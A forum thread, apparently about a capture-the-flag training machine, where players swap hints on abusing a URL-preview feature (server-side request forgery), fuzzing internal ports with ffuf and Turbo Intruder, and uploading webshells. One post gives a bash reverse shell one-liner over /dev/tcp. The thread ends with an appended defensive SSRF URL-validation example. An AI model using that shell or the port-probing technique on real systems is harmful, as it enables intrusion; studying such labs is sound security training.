hello is there anyone who want to join me and try pwn this box ?
I guess you can compile a simple program locally to run a shell… upload to the machine… set the suid on the file using the vulnerability and then run it?
You can save any type of request from Burp to a file, replace part of it with FUZZ, then use
ffuf -request requestfile -request-proto http -w wordlist
To send it as-is except for the part being fuzzed. For this box, you need something like -fr unsplash or another term that's only in bad responses and the wordlist needs to be the list of ports
Correct me if I'm wrong but
Ok I'll do that
You are indeed mistaken: ffuf is able to handle requests like that, you just need to generate a request template for it. To be fair though, I don't know of a way to do it in just one command and without using an additional file.
Thanks to everyone who gave me little helping nudges along the way! I have really been enjoying being part of this community
yes. standard payload works fine with some changes "/bin/bash -i >& /dev/tcp/IP/9001 0>&1". you just need to mask spaces.
Ahh okay. I guess I missed specifying the "doing it in a single command" part. That's why I used a python script which did all the work for me.
I wasn't able to get a lot of success with curl as the output saved by curl was a file with an unholy mixture of some HTTP response headers and parts of a gzip file which failed to extract.
Also it's awesome that you can do it with ffuf. It would be great if you can share the steps
quickly found the Preview thing/or httping to the attacker's machine and uploading a script. but that's it. nothing seems to be working from there. can't run anything. only downloading files. ffuf, feroxbuster, Burp, gobuster find nothing with any of the 50+ lists i've tried. uploads directory not accessible. no temp directory. nothing. after five months of academy and labs, another box i give up on.
That was TOUGH! Not sure I'd call it an Easy box given the amount of hoops to jump through.
User took me a while to finally have the "aha!" moment I needed thanks to @Geexirooz_1's hint. Root was definitely easier but still super interesting
This command gets only 1 hit, then take it and go with a browser/curl/burp/etc…
How much time do you need to do that? Probably less than writing a python script
Yeah this one kicked my ***. Finally rooted after a lot of nudges from here.
Hints for root plzzz… tried all the methods. a little nudge would be great :raised_hands:
Initial foothold is very challenging. After that it's pretty straightforward.
PM me for help/nudges anytime.
hey guys, I am literally struggling here, here is what I found until now:
- the preview functionality uploads a file to the server to a temp place but it can be accessed only once; when you upload it via the website UI the image src changes to the one you uploaded.
- there is another domain but it is moved permanently to the current domain we have, basically useless.
what do I look for ??
What could you do with a URL preview function that downloads a file from a URL? Other hints here should help. DM me if you are stuck
- You don't need a rev shell
- You'll get far with burp
- Persistence will be key
turbo intruder finally did it for me thanks. I would be curious how someone did it with ffuf as I tried that, failed, then wasted time on other stuff because I thought I had already properly enumerated
I finally solved it, guys who already solved it, clean up the stuff you left behind
Ok, I'm stuck. So far I've been able to upload a file, and it auto downloads it back. But the php file does not get executed, just printed out back to me. I've tried other webshells (jsp, perl, coldfusion) and same deal. Can I get a hint towards getting a foothold?
Thanks!
also: i've tried the upload file and enter cover URL related link via repeater on burpsuite and it auto deletes it even before I can repeat the auto-download file request
Uploading a reverse shell is a rabbit hole. Look at the OWASP Top 10 (2021); it's in there; you can gain a foothold from that page without uploading a shell. And use Turbo Intruder.
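The hints above revolve around a "preview" feature that fetches a user-supplied URL, and the OWASP Top 10 (2021) entry that covers it is server-side request forgery. As an added example that is not part of this thread or the box, here is the check a defender would put in front of such a fetcher: an allowlist of schemes and ports, resolution of the hostname, and rejection of any answer that is not a public unicast address (loopback, RFC 1918, link-local including the cloud metadata range, and IPv4-mapped IPv6 forms). The resolver table, hostnames and addresses are constructed for the offline example; `check_preview_url` and `FAKE_DNS` are hypothetical names.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical preview-fetcher policy: only these schemes and ports may be fetched.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed resolver table so the example runs offline. A real fetcher would use
# socket.getaddrinfo and then connect to the address it validated (not re-resolve),
# otherwise a DNS rebinding answer can slip past the check.
FAKE_DNS = {
    "images.example.com": ["93.184.216.34"],     # constructed public address
    "localhost": ["127.0.0.1"],
    "internal.corp.example": ["10.0.0.5"],
    "metadata.example": ["169.254.169.254"],
}


def fake_resolve(host):
    """Stand-in for DNS resolution; raises ValueError for unknown names."""
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise ValueError(f"unresolvable host: {host}")


def is_public_address(ip):
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:127.0.0.1 must be judged as 127.0.0.1, not as an "IPv6" address.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    # is_global already excludes loopback, private, link-local and reserved
    # ranges; multicast is not covered by it, so exclude it explicitly.
    return addr.is_global and not addr.is_multicast


def check_preview_url(url, resolve=fake_resolve):
    """Return (ok, reason); ok is True only if every resolved address is public."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    # Literal IPs skip DNS; hostnames are resolved and every answer is checked.
    try:
        ipaddress.ip_address(host)
        addrs = [host]
    except ValueError:
        try:
            addrs = resolve(host)
        except ValueError as exc:
            return False, str(exc)
    for ip in addrs:
        if not is_public_address(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in (
        "https://images.example.com/cover.jpg",
        "http://localhost/",
        "http://metadata.example/latest",
        "http://images.example.com:8080/",
        "http://[::ffff:127.0.0.1]/",
    ):
        print(candidate, "->", check_preview_url(candidate))
```

The port allowlist is what makes the port-scanning trick in this thread (fuzzing the preview URL's port and filtering on a response marker) stop yielding information: every non-allowlisted port returns the same rejection before any connection is made. Logging the rejection reason also gives the blue team a clean detection signal for someone probing the feature.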